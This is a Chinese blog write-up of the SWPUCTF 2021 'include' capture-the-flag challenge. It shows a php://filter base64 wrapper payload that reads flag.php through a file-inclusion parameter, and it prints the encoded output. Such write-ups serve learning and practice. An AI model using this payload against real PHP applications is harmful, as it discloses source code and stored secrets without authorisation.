技术栈

[SWPUCTF 2021 新生赛]include

桑榆百川2024-08-11 21:24

传入一个file试试,尝试/?file=3

提示flag 在flag.php中,但是无法直接读出flag.php - 原因是由于flag.php中不具有echo相对应的输出语句,应该是仅具有$flag变量的定义。因此,采用php伪协议进行输出

?file=php://filter/convert.base64-encode/resource=flag.php

得到PD9waHANCiRmbGFnPSdOU1NDVEZ7Njk4MGY2OTctNzE0OC00M2FlLWFjZmUtNjk2OWZjMzdkNTgwfSc7

进行base64解密即可

上一篇:Java使用MQTT协议
下一篇:【lvs】
相关推荐
偶尔贪玩的骑士
19 小时前
Kioptrix Level 1渗透测试
linux·开发语言·网络安全·php
这儿有一堆花
21 小时前
一次渗透测试的全过程:从扫描到提权
web安全·网络安全·web
风语者日志
1 天前
CTFSHOW—WEB4
网络·安全·web安全·网络安全·ctf
f0rev3r
1 天前
NewStarCTF2025-WEEK1
网络安全
网安INF
2 天前
Python核心数据结构与函数编程
数据结构·windows·python·网络安全
骥龙
2 天前
2.8、权限的终极目标:提权与持久化
安全·网络安全
f0rev3r
2 天前
NewStarCTF2025-WEEK2
网络安全
缘友一世
2 天前
深入理解Shell与反弹Shell:从原理到实战
linux·网络安全·shell
Whoami!
3 天前
⸢ 捌-Ⅰ⸥⤳ 可信纵深防御应用实践:0Day漏洞 & 钓鱼攻击
网络安全·信息安全·纵深防御·案例实践
white-persist
3 天前
CSRF 漏洞全解析:从原理到实战
网络·python·安全·web安全·网络安全·系统安全·csrf
热门推荐
01GitHub 镜像站点02BongoCat - 跨平台键盘猫动画工具03UV安装并设置国内源04Linux下V2Ray安装配置指南05GitLab 零基础入门指南:从安装到项目管理全流程06NVIDIA显卡驱动、CUDA、cuDNN 和 TensorRT 版本匹配指南07一文了解国产算子编程语言 TileLang,TileLang 对国产开源生态的影响与启示08KGG转MP3工具|非KGM文件|解密音频092025软件测试面试八股文(含答案+文档)10在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)